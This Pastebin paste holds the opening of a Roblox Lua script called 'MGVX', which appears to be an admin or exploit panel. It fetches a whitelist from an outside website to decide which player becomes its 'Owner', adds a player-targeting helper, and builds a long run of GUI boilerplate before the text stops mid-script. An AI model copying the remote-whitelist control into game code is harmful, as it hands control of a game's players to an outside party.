Advertisement
Guest User

Untitled

a guest
Jan 21st, 2017
108
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 77.97 KB | None | 0 0
  1. print("MGVX LOADED")
  2.  
  3. local CoreValues = Instance.new("Folder")
  4. CoreValues.Name = "MGVXCore"
  5. CoreValues.Parent = game
  6.  
  7.  
  8. local Http = game:GetService("HttpService")
  9. local gWorkspace = game:GetService("Workspace")
  10. local OwnerGui = game:GetService("Players").LocalPlayer.PlayerGui
  11. local Players = game:GetService("Players")
  12. local Website = "http://mgvx.tk/"
  13.  
  14. -- Makes Sure EveryThing Goes Ok!---
  15. print("MGVX LOADED")
  16.  
  17.  
  18. --------
  19. local WhiteList = Http:GetAsync(Website)
  20. local BlackListed = {}
  21.  
  22. -- Variables---
  23. for i,v in pairs(game.Players:GetChildren()) do
  24. if string.find(WhiteList, ",") then
  25. local sep = true
  26. if string.find(WhiteList, v.UserId) then
  27. Owner = game:GetService("Players"):WaitForChild(v.Name)
  28. end
  29. end
  30. end
  31.  
  32. local plr = Owner
  33.  
  34. for i,v in pairs(game.Players:GetChildren())do if v.Name ~= plr then otherp = v end end
  35. for i,v in pairs(game.Players:GetChildren())do if v == plr then Owner = v end end
  36.  
  37. if Owner == nil then
  38. Owner = game.Players.LocalPlayer
  39. end
  40.  
  41. if plr == nil then
  42. plr = Owner
  43. end
  44.  
  45.  
  46. ------------Functions----------
  47. function GetPlr(plr, str)
  48. local plrz = {} str = str:lower()
  49. if str == "all" then plrz = game.Players:children()
  50. elseif str == "others" then for i, v in pairs(game.Players:children()) do if v ~= plr then table.insert(plrz, v) end end
  51. else
  52. local sn = {1} local en = {}
  53. for i = 1, #str do if str:sub(i,i) == "," then table.insert(sn, i+1) table.insert(en,i-1) end end
  54. for x = 1, #sn do
  55. if (sn[x] and en[x] and str:sub(sn[x],en[x]) == "me") or (sn[x] and str:sub(sn[x]) == "me") then table.insert(plrz, plr)
  56. elseif (sn[x] and en[x] and str:sub(sn[x],en[x]) == "random") or (sn[x] and str:sub(sn[x]) == "random") then table.insert(plrz, game.Players:children()[math.random(#game.Players:children())])
  57. elseif (sn[x] and en[x] and str:sub(sn[x],en[x]):sub(1,4) == "team") then
  58. if game:findFirstChild("Teams") then for a, v in pairs(game.Teams:children()) do if v:IsA("Team") and str:sub(sn[x],en[x]):sub(6) ~= "" and v.Name:lower():find(str:sub(sn[x],en[x]):sub(6)) == 1 then
  59. for q, p in pairs(game.Players:children()) do if p.TeamColor == v.TeamColor then table.insert(plrz, p) end end break
  60. end end end
  61. elseif (sn[x] and str:sub(sn[x]):sub(1,4):lower() == "team") then
  62. if game:findFirstChild("Teams") then for a, v in pairs(game.Teams:children()) do if v:IsA("Team") and str:sub(sn[x],en[x]):sub(6) ~= "" and v.Name:lower():find(str:sub(sn[x]):sub(6)) == 1 then
  63. for q, p in pairs(game.Players:children()) do if p.TeamColor == v.TeamColor then table.insert(plrz, p) end end break
  64. end end end
  65. else
  66. for a, plyr in pairs(game.Players:children()) do
  67. if (sn[x] and en[x] and str:sub(sn[x],en[x]) ~= "" and plyr.Name:lower():find(str:sub(sn[x],en[x])) == 1) or (sn[x] and str:sub(sn[x]) ~= "" and plyr.Name:lower():find(str:sub(sn[x])) == 1) or (str ~= "" and plyr.Name:lower():find(str) == 1) then
  68. table.insert(plrz, plyr) break
  69. end
  70. end
  71. end
  72. end
  73. end
  74. return plrz
  75. end
  76.  
  77.  
  78. local OtherP = Instance.new("StringValue")
  79. OtherP.Name = "OtherP"
  80. OtherP.Value = otherp.Name
  81. OtherP.Parent = CoreValues
  82.  
  83. local OwnerV = Instance.new("StringValue")
  84. OwnerV.Name = "Owner"
  85. OwnerV.Value = Owner.Name
  86. OwnerV.Parent = CoreValues
  87.  
  88.  
  89.  
  90. local NewGuiPart1 = Instance.new("ScreenGui")
  91. NewGuiPart1.Name = "MGVX"
  92. NewGuiPart1.Parent = Owner.PlayerGui
  93.  
  94.  
  95.  
  96. -------
  97. local NewGuiPart2 = Instance.new("Frame")
  98. NewGuiPart2.Active = true
  99. NewGuiPart2.Position = UDim2.new(0.368000001, 0, 0.0829999968, 0)
  100. NewGuiPart2.Size = UDim2.new(0, 300, 0, 350)
  101. NewGuiPart2.Style = Enum.FrameStyle.DropShadow
  102. NewGuiPart2.ClipsDescendants = true
  103. NewGuiPart2.Draggable = true
  104. NewGuiPart2.Parent = NewGuiPart1
  105. -------
  106. local NewGuiPart3 = Instance.new("TextButton")
  107. NewGuiPart3.BackgroundColor3 = Color3.new(0.0666667, 0.0666667, 0.0666667)
  108. NewGuiPart3.BackgroundTransparency = 0.69999998807907
  109. NewGuiPart3.BorderColor3 = Color3.new(0, 0, 0)
  110. NewGuiPart3.BorderSizePixel = 0
  111. NewGuiPart3.Name = "TL1"
  112. NewGuiPart3.Position = UDim2.new(0, 200, 0, 0)
  113. NewGuiPart3.Selectable = true
  114. NewGuiPart3.Size = UDim2.new(0, 80, 0, 20)
  115. NewGuiPart3.Style = Enum.ButtonStyle.Custom
  116. NewGuiPart3.FontSize = Enum.FontSize.Size14
  117. NewGuiPart3.Text = "Refresh"
  118. NewGuiPart3.TextColor3 = Color3.new(1, 1, 1)
  119. NewGuiPart3.Parent = NewGuiPart2
  120. -------
  121. local NewGuiPart4 = Instance.new("TextLabel")
  122. NewGuiPart4.BackgroundColor3 = Color3.new(0.0666667, 0.0666667, 0.0666667)
  123. NewGuiPart4.BackgroundTransparency = 1
  124. NewGuiPart4.BorderColor3 = Color3.new(0, 0, 0)
  125. NewGuiPart4.BorderSizePixel = 0
  126. NewGuiPart4.Name = "TL2"
  127. NewGuiPart4.Position = UDim2.new(0, 50, 0, 0)
  128. NewGuiPart4.Size = UDim2.new(0, 80, 0, 20)
  129. NewGuiPart4.FontSize = Enum.FontSize.Size14
  130. NewGuiPart4.Text = "Loading..."
  131. NewGuiPart4.TextColor3 = Color3.new(1, 1, 1)
  132. NewGuiPart4.TextScaled = true
  133. NewGuiPart4.TextWrapped = true
  134. NewGuiPart4.Parent = NewGuiPart2
  135. -------
  136. local NewGuiPart5 = Instance.new("Frame")
  137. NewGuiPart5.BackgroundColor3 = Color3.new(0, 0, 0)
  138. NewGuiPart5.BackgroundTransparency = 1
  139. NewGuiPart5.BorderSizePixel = 5
  140. NewGuiPart5.Name = "Main"
  141. NewGuiPart5.Position = UDim2.new(1, -280, 0.0829999968, 0)
  142. NewGuiPart5.Size = UDim2.new(0, 250, 0, 300)
  143. NewGuiPart5.Visible = false
  144. NewGuiPart5.Draggable = true
  145. NewGuiPart5.Parent = NewGuiPart2
  146. -------
  147. local NewGuiPart6 = Instance.new("ScrollingFrame")
  148. NewGuiPart6.BackgroundTransparency = 1
  149. NewGuiPart6.Name = "PlayerList"
  150. NewGuiPart6.Position = UDim2.new(0, -7, 0, -10)
  151. NewGuiPart6.Selectable = true
  152. NewGuiPart6.Size = UDim2.new(0, 290, 0, 320)
  153. NewGuiPart6.ClipsDescendants = true
  154. NewGuiPart6.Parent = NewGuiPart5
  155. -------
  156. local NewGuiPart7 = Instance.new("Frame")
  157. NewGuiPart7.BackgroundColor3 = Color3.new(0, 0, 0)
  158. NewGuiPart7.BackgroundTransparency = 1
  159. NewGuiPart7.BorderSizePixel = 0
  160. NewGuiPart7.Size = UDim2.new(0, 290, 0, 35)
  161. NewGuiPart7.Parent = NewGuiPart6
  162. -------
  163. local NewGuiPart8 = Instance.new("ImageLabel")
  164. NewGuiPart8.Active = false
  165. NewGuiPart8.BackgroundTransparency = 1
  166. NewGuiPart8.BorderSizePixel = 0
  167. NewGuiPart8.Position = UDim2.new(0, 10, 0, 15)
  168. NewGuiPart8.Selectable = false
  169. NewGuiPart8.Size = UDim2.new(0, 65, 0, 25)
  170. NewGuiPart8.Image = "http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username=ROBLOX"
  171. NewGuiPart8.Parent = NewGuiPart7
  172. -------
  173. local NewGuiPart9 = Instance.new("TextLabel")
  174. NewGuiPart9.BackgroundTransparency = 1
  175. NewGuiPart9.BorderSizePixel = 0
  176. NewGuiPart9.Position = UDim2.new(0, 100, 0, 15)
  177. NewGuiPart9.Size = UDim2.new(0, 100, 0, 25)
  178. NewGuiPart9.Font = Enum.Font.Legacy
  179. NewGuiPart9.FontSize = Enum.FontSize.Size10
  180. NewGuiPart9.Text = ""
  181. NewGuiPart9.TextColor3 = Color3.new(1, 1, 1)
  182. NewGuiPart9.TextScaled = true
  183. NewGuiPart9.TextWrapped = true
  184. NewGuiPart9.Parent = NewGuiPart7
  185. -------
  186. local NewGuiPart10 = Instance.new("Frame")
  187. NewGuiPart10.BackgroundColor3 = Color3.new(0, 0, 0)
  188. NewGuiPart10.BackgroundTransparency = 1
  189. NewGuiPart10.BorderSizePixel = 0
  190. NewGuiPart10.Position = UDim2.new(0, 0, 0, 35)
  191. NewGuiPart10.Size = UDim2.new(0, 290, 0, 35)
  192. NewGuiPart10.Parent = NewGuiPart6
  193. -------
  194. local NewGuiPart11 = Instance.new("ImageLabel")
  195. NewGuiPart11.Active = false
  196. NewGuiPart11.BackgroundTransparency = 1
  197. NewGuiPart11.BorderSizePixel = 0
  198. NewGuiPart11.Position = UDim2.new(0, 10, 0, 15)
  199. NewGuiPart11.Selectable = false
  200. NewGuiPart11.Size = UDim2.new(0, 65, 0, 25)
  201. NewGuiPart11.Image = ""
  202. NewGuiPart11.Parent = NewGuiPart10
  203. -------
  204. local NewGuiPart12 = Instance.new("TextLabel")
  205. NewGuiPart12.BackgroundTransparency = 1
  206. NewGuiPart12.BorderSizePixel = 0
  207. NewGuiPart12.Position = UDim2.new(0, 100, 0, 15)
  208. NewGuiPart12.Size = UDim2.new(0, 100, 0, 25)
  209. NewGuiPart12.Font = Enum.Font.Legacy
  210. NewGuiPart12.FontSize = Enum.FontSize.Size10
  211. NewGuiPart12.Text = ""
  212. NewGuiPart12.TextColor3 = Color3.new(1, 1, 1)
  213. NewGuiPart12.TextScaled = true
  214. NewGuiPart12.TextWrapped = true
  215. NewGuiPart12.Parent = NewGuiPart10
  216. -------
  217. local NewGuiPart13 = Instance.new("Frame")
  218. NewGuiPart13.BackgroundColor3 = Color3.new(0, 0, 0)
  219. NewGuiPart13.BackgroundTransparency = 1
  220. NewGuiPart13.BorderSizePixel = 0
  221. NewGuiPart13.Position = UDim2.new(0, 0, 0, 70)
  222. NewGuiPart13.Size = UDim2.new(0, 290, 0, 35)
  223. NewGuiPart13.Parent = NewGuiPart6
  224. -------
  225. local NewGuiPart14 = Instance.new("ImageLabel")
  226. NewGuiPart14.Active = false
  227. NewGuiPart14.BackgroundTransparency = 1
  228. NewGuiPart14.BorderSizePixel = 0
  229. NewGuiPart14.Position = UDim2.new(0, 10, 0, 15)
  230. NewGuiPart14.Selectable = false
  231. NewGuiPart14.Size = UDim2.new(0, 65, 0, 25)
  232. NewGuiPart14.Image = ""
  233. NewGuiPart14.Image = ""
  234. NewGuiPart14.Parent = NewGuiPart13
  235. -------
  236. local NewGuiPart15 = Instance.new("TextLabel")
  237. NewGuiPart15.BackgroundTransparency = 1
  238. NewGuiPart15.BorderSizePixel = 0
  239. NewGuiPart15.Position = UDim2.new(0, 100, 0, 15)
  240. NewGuiPart15.Size = UDim2.new(0, 100, 0, 25)
  241. NewGuiPart15.Font = Enum.Font.Legacy
  242. NewGuiPart15.FontSize = Enum.FontSize.Size10
  243. NewGuiPart15.Text = ""
  244. NewGuiPart15.TextColor3 = Color3.new(1, 1, 1)
  245. NewGuiPart15.TextScaled = true
  246. NewGuiPart15.TextWrapped = true
  247. NewGuiPart15.Parent = NewGuiPart13
  248. -------
  249. local NewGuiPart16 = Instance.new("Frame")
  250. NewGuiPart16.BackgroundColor3 = Color3.new(0, 0, 0)
  251. NewGuiPart16.BackgroundTransparency = 1
  252. NewGuiPart16.BorderSizePixel = 0
  253. NewGuiPart16.Position = UDim2.new(0, 0, 0, 105)
  254. NewGuiPart16.Size = UDim2.new(0, 290, 0, 35)
  255. NewGuiPart16.Parent = NewGuiPart6
  256. -------
  257. local NewGuiPart17 = Instance.new("ImageLabel")
  258. NewGuiPart17.Active = false
  259. NewGuiPart17.BackgroundTransparency = 1
  260. NewGuiPart17.BorderSizePixel = 0
  261. NewGuiPart17.Position = UDim2.new(0, 10, 0, 15)
  262. NewGuiPart17.Selectable = false
  263. NewGuiPart17.Size = UDim2.new(0, 65, 0, 25)
  264. NewGuiPart17.Image = ""
  265. NewGuiPart17.Image = ""
  266. NewGuiPart17.Parent = NewGuiPart16
  267. -------
  268. local NewGuiPart18 = Instance.new("TextLabel")
  269. NewGuiPart18.BackgroundTransparency = 1
  270. NewGuiPart18.BorderSizePixel = 0
  271. NewGuiPart18.Position = UDim2.new(0, 100, 0, 15)
  272. NewGuiPart18.Size = UDim2.new(0, 100, 0, 25)
  273. NewGuiPart18.Font = Enum.Font.Legacy
  274. NewGuiPart18.FontSize = Enum.FontSize.Size10
  275. NewGuiPart18.Text = ""
  276. NewGuiPart18.TextColor3 = Color3.new(1, 1, 1)
  277. NewGuiPart18.TextScaled = true
  278. NewGuiPart18.TextWrapped = true
  279. NewGuiPart18.Parent = NewGuiPart16
  280. -------
  281. local NewGuiPart19 = Instance.new("Frame")
  282. NewGuiPart19.BackgroundColor3 = Color3.new(0, 0, 0)
  283. NewGuiPart19.BackgroundTransparency = 1
  284. NewGuiPart19.BorderSizePixel = 0
  285. NewGuiPart19.Position = UDim2.new(0, 0, 0, 140)
  286. NewGuiPart19.Size = UDim2.new(0, 290, 0, 35)
  287. NewGuiPart19.Parent = NewGuiPart6
  288. -------
  289. local NewGuiPart20 = Instance.new("ImageLabel")
  290. NewGuiPart20.Active = false
  291. NewGuiPart20.BackgroundTransparency = 1
  292. NewGuiPart20.BorderSizePixel = 0
  293. NewGuiPart20.Position = UDim2.new(0, 10, 0, 15)
  294. NewGuiPart20.Selectable = false
  295. NewGuiPart20.Size = UDim2.new(0, 65, 0, 25)
  296. NewGuiPart20.Image = ""
  297. NewGuiPart20.Image = ""
  298. NewGuiPart20.Parent = NewGuiPart19
  299. -------
  300. local NewGuiPart21 = Instance.new("TextLabel")
  301. NewGuiPart21.BackgroundTransparency = 1
  302. NewGuiPart21.BorderSizePixel = 0
  303. NewGuiPart21.Position = UDim2.new(0, 100, 0, 15)
  304. NewGuiPart21.Size = UDim2.new(0, 100, 0, 25)
  305. NewGuiPart21.Font = Enum.Font.Legacy
  306. NewGuiPart21.FontSize = Enum.FontSize.Size10
  307. NewGuiPart21.Text = ""
  308. NewGuiPart21.TextColor3 = Color3.new(1, 1, 1)
  309. NewGuiPart21.TextScaled = true
  310. NewGuiPart21.TextWrapped = true
  311. NewGuiPart21.Parent = NewGuiPart19
  312. -------
  313. local NewGuiPart22 = Instance.new("Frame")
  314. NewGuiPart22.BackgroundColor3 = Color3.new(0, 0, 0)
  315. NewGuiPart22.BackgroundTransparency = 1
  316. NewGuiPart22.BorderSizePixel = 0
  317. NewGuiPart22.Position = UDim2.new(0, 0, 0, 175)
  318. NewGuiPart22.Size = UDim2.new(0, 290, 0, 35)
  319. NewGuiPart22.Parent = NewGuiPart6
  320. -------
  321. local NewGuiPart23 = Instance.new("ImageLabel")
  322. NewGuiPart23.Active = false
  323. NewGuiPart23.BackgroundTransparency = 1
  324. NewGuiPart23.BorderSizePixel = 0
  325. NewGuiPart23.Position = UDim2.new(0, 10, 0, 15)
  326. NewGuiPart23.Selectable = false
  327. NewGuiPart23.Size = UDim2.new(0, 65, 0, 25)
  328. NewGuiPart23.Image = ""
  329. NewGuiPart23.Image = ""
  330. NewGuiPart23.Parent = NewGuiPart22
  331. -------
  332. local NewGuiPart24 = Instance.new("TextLabel")
  333. NewGuiPart24.BackgroundTransparency = 1
  334. NewGuiPart24.BorderSizePixel = 0
  335. NewGuiPart24.Position = UDim2.new(0, 100, 0, 15)
  336. NewGuiPart24.Size = UDim2.new(0, 100, 0, 25)
  337. NewGuiPart24.Font = Enum.Font.Legacy
  338. NewGuiPart24.FontSize = Enum.FontSize.Size10
  339. NewGuiPart24.Text = ""
  340. NewGuiPart24.TextColor3 = Color3.new(1, 1, 1)
  341. NewGuiPart24.TextScaled = true
  342. NewGuiPart24.TextWrapped = true
  343. NewGuiPart24.Parent = NewGuiPart22
  344. -------
  345. local NewGuiPart25 = Instance.new("Frame")
  346. NewGuiPart25.BackgroundColor3 = Color3.new(0, 0, 0)
  347. NewGuiPart25.BackgroundTransparency = 1
  348. NewGuiPart25.BorderSizePixel = 0
  349. NewGuiPart25.Position = UDim2.new(0, 0, 0, 205)
  350. NewGuiPart25.Size = UDim2.new(0, 290, 0, 35)
  351. NewGuiPart25.Parent = NewGuiPart6
  352. -------
  353. local NewGuiPart26 = Instance.new("ImageLabel")
  354. NewGuiPart26.Active = false
  355. NewGuiPart26.BackgroundTransparency = 1
  356. NewGuiPart26.BorderSizePixel = 0
  357. NewGuiPart26.Position = UDim2.new(0, 10, 0, 15)
  358. NewGuiPart26.Selectable = false
  359. NewGuiPart26.Size = UDim2.new(0, 65, 0, 25)
  360. NewGuiPart26.Image = ""
  361. NewGuiPart26.Image = ""
  362. NewGuiPart26.Parent = NewGuiPart25
  363. -------
  364. local NewGuiPart27 = Instance.new("TextLabel")
  365. NewGuiPart27.BackgroundTransparency = 1
  366. NewGuiPart27.BorderSizePixel = 0
  367. NewGuiPart27.Position = UDim2.new(0, 100, 0, 15)
  368. NewGuiPart27.Size = UDim2.new(0, 100, 0, 25)
  369. NewGuiPart27.Font = Enum.Font.Legacy
  370. NewGuiPart27.FontSize = Enum.FontSize.Size10
  371. NewGuiPart27.Text = ""
  372. NewGuiPart27.TextColor3 = Color3.new(1, 1, 1)
  373. NewGuiPart27.TextScaled = true
  374. NewGuiPart27.TextWrapped = true
  375. NewGuiPart27.Parent = NewGuiPart25
  376. -------
  377. local NewGuiPart28 = Instance.new("Frame")
  378. NewGuiPart28.BackgroundColor3 = Color3.new(0, 0, 0)
  379. NewGuiPart28.BackgroundTransparency = 1
  380. NewGuiPart28.BorderSizePixel = 0
  381. NewGuiPart28.Position = UDim2.new(0, 0, 0, 240)
  382. NewGuiPart28.Size = UDim2.new(0, 290, 0, 35)
  383. NewGuiPart28.Parent = NewGuiPart6
  384. -------
  385. local NewGuiPart29 = Instance.new("ImageLabel")
  386. NewGuiPart29.Active = false
  387. NewGuiPart29.BackgroundTransparency = 1
  388. NewGuiPart29.BorderSizePixel = 0
  389. NewGuiPart29.Position = UDim2.new(0, 10, 0, 15)
  390. NewGuiPart29.Selectable = false
  391. NewGuiPart29.Size = UDim2.new(0, 65, 0, 25)
  392. NewGuiPart29.Image = ""
  393. NewGuiPart29.Image = ""
  394. NewGuiPart29.Parent = NewGuiPart28
  395. -------
  396. local NewGuiPart30 = Instance.new("TextLabel")
  397. NewGuiPart30.BackgroundTransparency = 1
  398. NewGuiPart30.BorderSizePixel = 0
  399. NewGuiPart30.Position = UDim2.new(0, 100, 0, 15)
  400. NewGuiPart30.Size = UDim2.new(0, 100, 0, 25)
  401. NewGuiPart30.Font = Enum.Font.Legacy
  402. NewGuiPart30.FontSize = Enum.FontSize.Size10
  403. NewGuiPart30.Text = ""
  404. NewGuiPart30.TextColor3 = Color3.new(1, 1, 1)
  405. NewGuiPart30.TextScaled = true
  406. NewGuiPart30.TextWrapped = true
  407. NewGuiPart30.Parent = NewGuiPart28
  408. -------
  409. local NewGuiPart31 = Instance.new("Frame")
  410. NewGuiPart31.BackgroundColor3 = Color3.new(0, 0, 0)
  411. NewGuiPart31.BackgroundTransparency = 1
  412. NewGuiPart31.BorderSizePixel = 0
  413. NewGuiPart31.Position = UDim2.new(0, 0, 0, 275)
  414. NewGuiPart31.Size = UDim2.new(0, 290, 0, 35)
  415. NewGuiPart31.Parent = NewGuiPart6
  416. -------
  417. local NewGuiPart32 = Instance.new("ImageLabel")
  418. NewGuiPart32.Active = false
  419. NewGuiPart32.BackgroundTransparency = 1
  420. NewGuiPart32.BorderSizePixel = 0
  421. NewGuiPart32.Position = UDim2.new(0, 10, 0, 15)
  422. NewGuiPart32.Selectable = false
  423. NewGuiPart32.Size = UDim2.new(0, 65, 0, 25)
  424. NewGuiPart32.Image = ""
  425. NewGuiPart32.Image = ""
  426. NewGuiPart32.Parent = NewGuiPart31
  427. -------
  428. local NewGuiPart33 = Instance.new("TextLabel")
  429. NewGuiPart33.BackgroundTransparency = 1
  430. NewGuiPart33.BorderSizePixel = 0
  431. NewGuiPart33.Position = UDim2.new(0, 100, 0, 15)
  432. NewGuiPart33.Size = UDim2.new(0, 100, 0, 25)
  433. NewGuiPart33.Font = Enum.Font.Legacy
  434. NewGuiPart33.FontSize = Enum.FontSize.Size10
  435. NewGuiPart33.Text = ""
  436. NewGuiPart33.TextColor3 = Color3.new(1, 1, 1)
  437. NewGuiPart33.TextScaled = true
  438. NewGuiPart33.TextWrapped = true
  439. NewGuiPart33.Parent = NewGuiPart31
  440. -------
  441. local NewGuiPart34 = Instance.new("Frame")
  442. NewGuiPart34.BackgroundColor3 = Color3.new(0, 0, 0)
  443. NewGuiPart34.BackgroundTransparency = 1
  444. NewGuiPart34.BorderSizePixel = 0
  445. NewGuiPart34.Position = UDim2.new(0, 0, 0, 305)
  446. NewGuiPart34.Size = UDim2.new(0, 290, 0, 35)
  447. NewGuiPart34.Parent = NewGuiPart6
  448. -------
  449. local NewGuiPart35 = Instance.new("ImageLabel")
  450. NewGuiPart35.Active = false
  451. NewGuiPart35.BackgroundTransparency = 1
  452. NewGuiPart35.BorderSizePixel = 0
  453. NewGuiPart35.Position = UDim2.new(0, 10, 0, 15)
  454. NewGuiPart35.Selectable = false
  455. NewGuiPart35.Size = UDim2.new(0, 65, 0, 25)
  456. NewGuiPart35.Image = ""
  457. NewGuiPart35.Image = ""
  458. NewGuiPart35.Parent = NewGuiPart34
  459. -------
  460. local NewGuiPart36 = Instance.new("TextLabel")
  461. NewGuiPart36.BackgroundTransparency = 1
  462. NewGuiPart36.BorderSizePixel = 0
  463. NewGuiPart36.Position = UDim2.new(0, 100, 0, 15)
  464. NewGuiPart36.Size = UDim2.new(0, 100, 0, 25)
  465. NewGuiPart36.Font = Enum.Font.Legacy
  466. NewGuiPart36.FontSize = Enum.FontSize.Size10
  467. NewGuiPart36.Text = ""
  468. NewGuiPart36.TextColor3 = Color3.new(1, 1, 1)
  469. NewGuiPart36.TextScaled = true
  470. NewGuiPart36.TextWrapped = true
  471. NewGuiPart36.Parent = NewGuiPart34
  472. -------
  473. local NewGuiPart37 = Instance.new("Frame")
  474. NewGuiPart37.BackgroundColor3 = Color3.new(0, 0, 0)
  475. NewGuiPart37.BackgroundTransparency = 1
  476. NewGuiPart37.BorderSizePixel = 0
  477. NewGuiPart37.Position = UDim2.new(0, 0, 0, 345)
  478. NewGuiPart37.Size = UDim2.new(0, 290, 0, 35)
  479. NewGuiPart37.Parent = NewGuiPart6
  480. -------
  481. local NewGuiPart38 = Instance.new("ImageLabel")
  482. NewGuiPart38.Active = false
  483. NewGuiPart38.BackgroundTransparency = 1
  484. NewGuiPart38.BorderSizePixel = 0
  485. NewGuiPart38.Position = UDim2.new(0, 10, 0, 15)
  486. NewGuiPart38.Selectable = false
  487. NewGuiPart38.Size = UDim2.new(0, 65, 0, 25)
  488. NewGuiPart38.Image = ""
  489. NewGuiPart38.Image = ""
  490. NewGuiPart38.Parent = NewGuiPart37
  491. -------
  492. local NewGuiPart39 = Instance.new("TextLabel")
  493. NewGuiPart39.BackgroundTransparency = 1
  494. NewGuiPart39.BorderSizePixel = 0
  495. NewGuiPart39.Position = UDim2.new(0, 100, 0, 15)
  496. NewGuiPart39.Size = UDim2.new(0, 100, 0, 25)
  497. NewGuiPart39.Font = Enum.Font.Legacy
  498. NewGuiPart39.FontSize = Enum.FontSize.Size10
  499. NewGuiPart39.Text = ""
  500. NewGuiPart39.TextColor3 = Color3.new(1, 1, 1)
  501. NewGuiPart39.TextScaled = true
  502. NewGuiPart39.TextWrapped = true
  503. NewGuiPart39.Parent = NewGuiPart37
  504. -------
  505. local NewGuiPart40 = Instance.new("Frame")
  506. NewGuiPart40.BackgroundColor3 = Color3.new(0, 0, 0)
  507. NewGuiPart40.BackgroundTransparency = 1
  508. NewGuiPart40.BorderSizePixel = 0
  509. NewGuiPart40.Position = UDim2.new(0, 0, 0, 375)
  510. NewGuiPart40.Size = UDim2.new(0, 290, 0, 35)
  511. NewGuiPart40.Parent = NewGuiPart6
  512. -------
  513. local NewGuiPart41 = Instance.new("ImageLabel")
  514. NewGuiPart41.Active = false
  515. NewGuiPart41.BackgroundTransparency = 1
  516. NewGuiPart41.BorderSizePixel = 0
  517. NewGuiPart41.Position = UDim2.new(0, 10, 0, 15)
  518. NewGuiPart41.Selectable = false
  519. NewGuiPart41.Size = UDim2.new(0, 65, 0, 25)
  520. NewGuiPart41.Image = ""
  521. NewGuiPart41.Image = ""
  522. NewGuiPart41.Parent = NewGuiPart40
  523. -------
  524. local NewGuiPart42 = Instance.new("TextLabel")
  525. NewGuiPart42.BackgroundTransparency = 1
  526. NewGuiPart42.BorderSizePixel = 0
  527. NewGuiPart42.Position = UDim2.new(0, 100, 0, 15)
  528. NewGuiPart42.Size = UDim2.new(0, 100, 0, 25)
  529. NewGuiPart42.Font = Enum.Font.Legacy
  530. NewGuiPart42.FontSize = Enum.FontSize.Size10
  531. NewGuiPart42.Text = ""
  532. NewGuiPart42.TextColor3 = Color3.new(1, 1, 1)
  533. NewGuiPart42.TextScaled = true
  534. NewGuiPart42.TextWrapped = true
  535. NewGuiPart42.Parent = NewGuiPart40
  536. -------
  537. local NewGuiPart43 = Instance.new("Frame")
  538. NewGuiPart43.BackgroundColor3 = Color3.new(0, 0, 0)
  539. NewGuiPart43.BackgroundTransparency = 1
  540. NewGuiPart43.BorderSizePixel = 0
  541. NewGuiPart43.Position = UDim2.new(0, 0, 0, 405)
  542. NewGuiPart43.Size = UDim2.new(0, 290, 0, 35)
  543. NewGuiPart43.Parent = NewGuiPart6
  544. -------
  545. local NewGuiPart44 = Instance.new("ImageLabel")
  546. NewGuiPart44.Active = false
  547. NewGuiPart44.BackgroundTransparency = 1
  548. NewGuiPart44.BorderSizePixel = 0
  549. NewGuiPart44.Position = UDim2.new(0, 10, 0, 15)
  550. NewGuiPart44.Selectable = false
  551. NewGuiPart44.Size = UDim2.new(0, 65, 0, 25)
  552. NewGuiPart44.Image = ""
  553. NewGuiPart44.Image = ""
  554. NewGuiPart44.Parent = NewGuiPart43
  555. -------
  556. local NewGuiPart45 = Instance.new("TextLabel")
  557. NewGuiPart45.BackgroundTransparency = 1
  558. NewGuiPart45.BorderSizePixel = 0
  559. NewGuiPart45.Position = UDim2.new(0, 100, 0, 15)
  560. NewGuiPart45.Size = UDim2.new(0, 100, 0, 25)
  561. NewGuiPart45.Font = Enum.Font.Legacy
  562. NewGuiPart45.FontSize = Enum.FontSize.Size10
  563. NewGuiPart45.Text = ""
  564. NewGuiPart45.TextColor3 = Color3.new(1, 1, 1)
  565. NewGuiPart45.TextScaled = true
  566. NewGuiPart45.TextWrapped = true
  567. NewGuiPart45.Parent = NewGuiPart43
  568. -------
  569. local NewGuiPart46 = Instance.new("Frame")
  570. NewGuiPart46.BackgroundColor3 = Color3.new(0, 0, 0)
  571. NewGuiPart46.BackgroundTransparency = 1
  572. NewGuiPart46.BorderSizePixel = 0
  573. NewGuiPart46.Position = UDim2.new(0, 0, 0, 445)
  574. NewGuiPart46.Size = UDim2.new(0, 290, 0, 35)
  575. NewGuiPart46.Parent = NewGuiPart6
  576. -------
  577. local NewGuiPart47 = Instance.new("ImageLabel")
  578. NewGuiPart47.Active = false
  579. NewGuiPart47.BackgroundTransparency = 1
  580. NewGuiPart47.BorderSizePixel = 0
  581. NewGuiPart47.Position = UDim2.new(0, 10, 0, 15)
  582. NewGuiPart47.Selectable = false
  583. NewGuiPart47.Size = UDim2.new(0, 65, 0, 25)
  584. NewGuiPart47.Image = ""
  585. NewGuiPart47.Image = ""
  586. NewGuiPart47.Parent = NewGuiPart46
  587. -------
  588. local NewGuiPart48 = Instance.new("TextLabel")
  589. NewGuiPart48.BackgroundTransparency = 1
  590. NewGuiPart48.BorderSizePixel = 0
  591. NewGuiPart48.Position = UDim2.new(0, 100, 0, 15)
  592. NewGuiPart48.Size = UDim2.new(0, 100, 0, 25)
  593. NewGuiPart48.Font = Enum.Font.Legacy
  594. NewGuiPart48.FontSize = Enum.FontSize.Size10
  595. NewGuiPart48.Text = ""
  596. NewGuiPart48.TextColor3 = Color3.new(1, 1, 1)
  597. NewGuiPart48.TextScaled = true
  598. NewGuiPart48.TextWrapped = true
  599. NewGuiPart48.Parent = NewGuiPart46
  600. -------
  601. local NewGuiPart49 = Instance.new("TextButton")
  602. NewGuiPart49.BackgroundColor3 = Color3.new(0.0666667, 0.0666667, 0.0666667)
  603. NewGuiPart49.BackgroundTransparency = 0.69999998807907
  604. NewGuiPart49.BorderColor3 = Color3.new(0, 0, 0)
  605. NewGuiPart49.BorderSizePixel = 0
  606. NewGuiPart49.Name = "TL3"
  607. NewGuiPart49.Position = UDim2.new(0, 200, 0, 25)
  608. NewGuiPart49.Selectable = true
  609. NewGuiPart49.Size = UDim2.new(0, 80, 0, 20)
  610. NewGuiPart49.Style = Enum.ButtonStyle.Custom
  611. NewGuiPart49.FontSize = Enum.FontSize.Size14
  612. NewGuiPart49.Text = "Settings"
  613. NewGuiPart49.TextColor3 = Color3.new(1, 1, 1)
  614. NewGuiPart49.Parent = NewGuiPart2
  615. -------
  616. local NewGuiPart50 = Instance.new("Frame")
  617. NewGuiPart50.BackgroundTransparency = 1
  618. NewGuiPart50.Name = "ScrollingFrame"
